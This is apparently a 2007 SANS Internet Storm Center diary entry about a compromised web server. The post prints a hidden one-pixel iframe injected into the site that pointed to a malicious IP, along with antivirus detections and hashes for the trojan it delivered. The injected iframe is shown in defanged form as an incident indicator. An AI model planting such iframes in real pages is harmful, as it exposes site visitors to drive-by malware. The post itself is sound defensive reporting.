Another iframe on a compromised server pointing to javascript which then downloads malware. Jeff wrote in to tell us about a web server that had an iframe like this: <bo dy><i frame src='hxxp:// 81.95.149.28/logo/ index.php' width='1' height='1' style='visibility: hidden;'></i frame> The unencode javascript at 81.95.149.28/logo/ index.php then downloaded and ran hxxp:// 81.95.149.28/logo/ file.php , a binary PE trojan. Here is what virstotal had to say about file.php: AntiVir 7.4.0.32 06.05.2007 TR/Small.MI.25 AVG 7.5.0.467 06.05.2007 Generic4.SJO BitDefender 7.2 06.05.2007 Trojan.Agent.AXB DrWeb 4.33 06.05.2007 Trojan.DownLoader.23162 eSafe 7.0.15.0 06.05.2007 Win32.Small.mi eTrust-Vet 30.7.3693 06.05.2007 Win32/Chepvil!generic Ewido 4.0 06.05.2007 Trojan.Small.mi F-Secure 6.70.13030.0 06.05.2007 Trojan.Win32.Small.mi Ikarus T3.1.1.8 06.05.2007 Trojan.Win32.Small.mi Kaspersky 4.0.2.24 06.05.2007 Trojan.Win32.Small.mi Microsoft 1.2503 06.05.2007 TrojanDownloader:Win32/Agent!EF3C Norman 5.80.02 06.05.2007 W32/Smalltroj.BHMK Prevx1 V2 06.05.2007 Polynomial.Code.Exploit Sophos 4.18.0 06.01.2007 Mal/Clagger-E TheHacker 6.1.6.129 06.04.2007 Trojan/Small.mi VirusBuster 4.3.23:9 06.05.2007 no virus found Webwasher-Gateway 6.0.1 06.05.2007 Trojan.Small.MI.25 Aditional Information File size: 6767 bytes MD5: 3cefdebc529c408c8ba9ef20a0b6291c SHA1: 4d3599829828e90f6e27b886c9ee403163fc91f6 Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=e09499856113 The server has since had the iframe removed. The owner was a little less than gracious when we spoke this morning. He was aware that it was compromised and infecting web users. If you are notified that a system you run or own is involved in an incident please take action as soon as you can. Cheers, AdrienI will be teaching next: Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques - SANS Cyber Defence Asia Pacific 2021 |
Adrien de Beaupre 353 Posts ISC Handler Jun 5th 2007 |
Thread locked Subscribe |
Jun 5th 2007 1 decade ago |
Sign Up for Free or Log In to start participating in the conversation!